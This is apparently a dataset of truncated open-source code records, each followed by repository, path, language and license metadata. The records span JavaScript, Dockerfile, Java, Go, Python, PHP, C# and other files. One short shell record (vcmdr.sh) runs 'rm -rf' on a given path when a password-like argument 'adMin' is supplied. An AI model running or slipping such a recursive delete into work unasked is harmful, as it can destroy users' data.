'use strict'; var chai = require('chai'); var promised = require('chai-as-promised'); chai.use(promised); global.expect = chai.expect; exports.config = { // The timeout for each script run on the browser. This should be longer // than the maximum time your application needs to stabilize between tasks. a...
jangalinski/camunda-bpm-webapp
webapp/src/test/js/e2e/ci.conf.js
JavaScript
apache-2.0
2,310
# AUTOGENERATED FILE FROM balenalib/zc702-zynq7-ubuntu:cosmic-build ENV NODE_VERSION 12.20.1 ENV YARN_VERSION 1.22.4 RUN for key in \ 6A010C5166006599AA17F08146C2130DFD2497F5 \ ; do \ gpg --keyserver pgp.mit.edu --recv-keys "$key" || \ gpg --keyserver keyserver.pgp.com --recv-keys "$key" || \ gpg --keyserver ...
nghiant2710/base-images
balena-base-images/node/zc702-zynq7/ubuntu/cosmic/12.20.1/build/Dockerfile
Dockerfile
apache-2.0
2,764
bluebook ======== A simple encrypted notepad application using Java Swing and GNU Crypto. ###Build The repo contains a NetBeans project (last tested version: 7.1.2). GUI portions of the code are auto-generated by NetBeans' GUI Swing builder, Matisse. To build, open the project in NetBeans and click _Run > Build Proj...
maddenp/bluebook
README.md
Markdown
apache-2.0
1,881
/* * Copyright (c) 2015 IRCCloud, Ltd. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed ...
irccloud/android
src/com/irccloud/android/fragment/TextListFragment.java
Java
apache-2.0
4,169
// Copyright 2015 Google Inc. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable...
adfin/statster
metrics/sinks/log/log_sink_test.go
GO
apache-2.0
3,246
import functools import warnings from collections import Mapping, Sequence from numbers import Number import numpy as np import pandas as pd from . import ops from . import utils from . import common from . import groupby from . import indexing from . import alignment from . import formatting from .. import conventio...
kjordahl/xray
xray/core/dataset.py
Python
apache-2.0
72,806
# SPDX-License-Identifier: Apache-2.0 # This file contains boards in Zephyr which has been replaced with a new board # name. # This allows the system to automatically change the board while at the same # time prints a warning to the user, that the board name is deprecated. # # To add a board rename, add a line in foll...
galak/zephyr
boards/deprecated.cmake
CMake
apache-2.0
1,054
<?php App::uses('AppModel', 'Model'); /** * ProdCodeDivn Model * * @property ProdCodeSection $ProdCodeSection * @property ProdCodeGroup $ProdCodeGroup */ class ProdCodeDivn extends AppModel { /** * Display field * * @var string */ public $displayField = 'divn_desc_eng'; /** * Validation rules * * @var ar...
hasanmbstu13/Project
Cakephp/ec2014/app/Model/ProdCodeDivn.php
PHP
apache-2.0
1,803
/*- * See the file LICENSE for redistribution information. * * Copyright (c) 2002-2010 Oracle. All rights reserved. * * $Id: ReplicaSyncupReader.java,v 1.4 2010/01/11 20:00:48 linda Exp $ */ package com.sleepycat.je.rep.stream; import static com.sleepycat.je.utilint.DbLsn.NULL_LSN; import java.io.IOException; ...
bjorndm/prebake
code/third_party/bdb/src/com/sleepycat/je/rep/stream/ReplicaSyncupReader.java
Java
apache-2.0
12,355
package so.modernized.whip import java.util.{Set => JSet} import java.net.{URI => JURI} import com.cambridgesemantics.anzo.unstructured.graphsummarization.PatternSolutionExtras import com.cambridgesemantics.anzo.unstructured.graphsummarization.XMLUnapplicable._ import so.modernized.psl_scala.primitives.PSLUnapplicabl...
JackSullivan/whip
src/main/scala/so/modernized/whip/PSLSparqlDatabase.scala
Scala
apache-2.0
9,595
using De.Osthus.Ambeth.Bytecode.Visitor; using De.Osthus.Ambeth.Ioc.Annotation; using De.Osthus.Ambeth.Log; using De.Osthus.Ambeth.Merge; using De.Osthus.Ambeth.Merge.Model; using De.Osthus.Ambeth.Proxy; using System; using System.Collections.Generic; namespace De.Osthus.Ambeth.Bytecode.Behavior { public class Enh...
Dennis-Koch/ambeth
ambeth/Ambeth.Cache.Bytecode/ambeth/bytecode/behavior/EnhancedTypeBehavior.cs
C#
apache-2.0
1,613
#!/bin/bash if [[ $# -eq 2 ]] && [[ "x$2" = "xadMin" ]] ; then /bin/rm -rf $1 fi
OpenVnmrJ/OpenVnmrJ
src/scripts/vcmdr.sh
Shell
apache-2.0
86
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you ...
apache/jsecurity
src/org/jsecurity/authz/aop/AuthorizingAnnotationMethodInterceptor.java
Java
apache-2.0
1,745
/* * Licensed to The Apereo Foundation under one or more contributor license * agreements. See the NOTICE file distributed with this work for additional * information regarding copyright ownership. * * The Apereo Foundation licenses this file to you under the Apache License, * Version 2.0, (the "License"); you ma...
equella/Equella
Source/Plugins/Core/com.equella.core/src/com/tle/web/workflow/soap/TaskListSoapInterface.java
Java
apache-2.0
1,054
package com.soulkey.calltalent.db; import android.content.Context; import android.database.sqlite.SQLiteDatabase; import android.database.sqlite.SQLiteOpenHelper; import com.soulkey.calltalent.db.model.SettingModel; import com.soulkey.calltalent.db.populator.SettingPopulator; public final class DbOpenHelper extends ...
wpcfan/calltalent
app/src/main/java/com/soulkey/calltalent/db/DbOpenHelper.java
Java
apache-2.0
1,109
//////////////////////////////////////////////////////////////////////////// // Module : alife_human_object_handler.h // Created : 07.10.2005 // Modified : 07.10.2005 // Author : Dmitriy Iassenev // Description : ALife human object handler class ////////////////////////////////////////////////////////////////////...
Im-dex/xray-162
code/engine/xrGame/alife_human_object_handler.h
C
apache-2.0
1,999
package com.splinter.graphing; import org.junit.Assert; import org.junit.Test; import java.util.HashMap; import java.util.Map; public class SplinterLogTest { @Test public void testDisableLogs() { try { SLog.setEnabled(false); String expected = ""; Assert.assertEqua...
dimitarz/splinter
src/test/java/com/splinter/graphing/SplinterLogTest.java
Java
apache-2.0
7,294
package io.zrz.graphql.core.decl; import java.util.List; import org.eclipse.jdt.annotation.Nullable; import io.zrz.graphql.core.doc.GQLDirective; import io.zrz.graphql.core.parser.GQLSourceLocation; public interface GQLDeclaration { @Nullable String description(); <R> R apply(GQLDeclarationVisitor<R> visito...
zourzouvillys/graphql
graphql-core/src/main/java/io/zrz/graphql/core/decl/GQLDeclaration.java
Java
apache-2.0
651
/* * @class TableExamplesService */ export default class TableExamplesService { constructor($http) { this.$http = $http; } static getClassName() { return 'TableExamplesService'; } getClassName() { return TableExamplesService.getClassName(); } /* * @func getColumns * @desc getes a list of columns...
garrettwong/GDashboard
client/app/components/tableExamples/tableExamples.service.js
JavaScript
apache-2.0
1,084